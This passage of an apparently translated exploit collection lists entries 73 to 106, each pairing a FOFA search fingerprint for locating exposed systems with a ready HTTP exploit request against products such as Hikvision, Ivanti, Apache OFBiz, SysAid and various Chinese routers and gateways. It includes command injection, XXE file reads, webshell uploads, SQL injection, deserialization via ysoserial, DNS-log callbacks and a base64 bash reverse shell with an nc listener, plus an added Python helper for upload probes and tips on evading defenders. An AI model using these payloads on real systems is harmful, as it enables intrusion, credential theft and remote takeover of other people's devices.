S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue URL-decodes to a DOCTYPE that declares <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> and references &xxe; in the VALUE field, so the file content comes back in the response.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the backtick-substituted command wrote:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) Palm Campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is rendered as a FreeMarker template; the Execute built-in runs the command. Then fetch the file it wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello123456
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file from the directory given in target:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The raw request body is written to the path given in report, one directory above the report folder. Then fetch it:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

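Entries 61, 67, 77, 78 and 80 follow one routine: upload a file whose content is a random marker, then fetch it back from the path the page names and look for the marker. Hand-typing multipart bodies is where these checks usually go wrong (CRLF line endings, the extra "--" on delimiter lines, a Content-Length that no longer matches). The Python below is an added helper, not code from the original page. It rebuilds entry 78's request from the page's own boundary and marker (with the two parts in the other order, which servers do not care about) and shows that the body comes out at the 336 bytes the page's Content-Length header declares.

```python
import secrets
import string
from typing import Dict, List, Optional, Tuple

_ALPHABET = string.ascii_letters + string.digits


def random_marker(length: int = 27) -> str:
    """Unguessable marker, so a hit in the fetched file cannot be a coincidence."""
    return "".join(secrets.choice(_ALPHABET) for _ in range(length))


def build_multipart(fields: Dict[str, str],
                    files: List[Tuple[str, str, str, bytes]],
                    boundary: Optional[str] = None) -> Tuple[str, bytes]:
    """Return (Content-Type value, body bytes) for a multipart/form-data POST.

    files holds (field name, filename, content type, data).  Every delimiter
    line is '--' + boundary, the closing one gains a trailing '--', and every
    line ends in CRLF; the Content-Length header is simply len(body).
    """
    boundary = boundary or "----" + random_marker(24)
    chunks = []
    for name, value in fields.items():
        chunks.append(
            f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n{value}\r\n".encode()
        )
    for name, filename, ctype, data in files:
        head = (
            f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"; "
            f"filename=\"{filename}\"\r\nContent-Type: {ctype}\r\n\r\n"
        ).encode()
        chunks.append(head + data + b"\r\n")
    chunks.append(f"--{boundary}--\r\n".encode())
    body = b"".join(chunks)
    return f"multipart/form-data; boundary={boundary}", body


def roundtrip_confirmed(fetched: bytes, marker: str) -> bool:
    """The second request of each entry: does the served file carry our marker?"""
    return marker.encode() in fetched


# Entry 78's request, rebuilt from the boundary and marker shown on the page.
ENTRY_78_MARKER = "YsOxWxSvj1KyZow1PTsh98fdu6l"
ENTRY_78_CT, ENTRY_78_BODY = build_multipart(
    {"target": "/Applications/SkillDevelopAndEHS/"},
    [("file", ENTRY_78_MARKER + ".txt", "image/png", ENTRY_78_MARKER.encode())],
    boundary="----" + ENTRY_78_MARKER,
)

if __name__ == "__main__":
    print("Content-Type:", ENTRY_78_CT)
    print("Content-Length:", len(ENTRY_78_BODY))  # 336, matching the page
    print(ENTRY_78_BODY.decode())
    served = b"<html>" + ENTRY_78_MARKER.encode() + b"</html>"  # constructed reply
    print("round trip:", roundtrip_confirmed(served, ENTRY_78_MARKER))
```

Use a fresh random_marker() per target rather than the page's marker: a fixed string is both a fingerprint for defenders and a source of false positives when an earlier run left the file behind.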
81. Uniview (宇视) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

The sql field is evaluated as a FreeMarker template before it is used; the DNS-log callback confirms execution out of band.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below writes a Godzilla webshell:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting shell URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The %0a newlines end the ping command line and start a new one; ${IFS} stands in for the space, which the host field evidently rejects.

87. DAS-Security (安恒) Mingyu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The uploaded file is then reachable at /jfhatuwe.php

88. DAS-Security (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline-separated shell line that appends a PHP file to /usr/local/webui, the web root, so the written file is then reachable at /txzfsrur.php and its output contains assdwdmpidmsbzoabahpjhnokiduw.

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

Success indicator: the response contains 24642 (111*222). The .js%70 suffix is .jsp with the p percent-encoded, which gets the request past a filter that matches on the literal extension while the container still decodes it to the JSP.

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Tomcat treats ..;/ as a parent-directory segment, which is what lets the request reach the download endpoint through the /center/api/task prefix.

92. Hikvision operations management center session command execution
Fastjson deserialization command execution.
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin (奇安信) Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin (奇安信) Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (cciytdzu.txt, the filename sent above):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA: app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial (the xmlrpc <serializable> extension deserializes it; the DNS callback confirms execution):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the POC above and recompute Content-Length for the body actually sent:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz < 18.12.11 groovy remote code execution (ProgramExport)
FOFA: app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The command output is returned inside the exception message.

Reverse shell variant. Start a listener on the attacking host (Kali):
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Note: the base64 string above decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, i.e. the spaces are still percent-encoded, so bash will not parse it as intended; base64-encode the command with literal spaces (and your own listener address), and set Content-Length to the length of the body actually sent.

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

The rememberMe cookie carries the serialized Shiro payload (PAYLOAD); the command to run is supplied in the X-Token-Data header.

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA: app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA: app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the injected command follows the pipe in the param value.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA: icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA: body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The path traversal reaches the license/keys-status handler and the %3b (;) separates the injected curl command; the DNS callback confirms execution.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA: body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The server-side request is triggered by the ds:RetrievalMethod URI, so a hit on the listed DNS log host is the indicator.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA: body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (an external parameter entity that forces an outbound fetch):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA: title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

The request succeeds with an empty token, which is the point: the handler does not require authentication.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA: body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA: body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
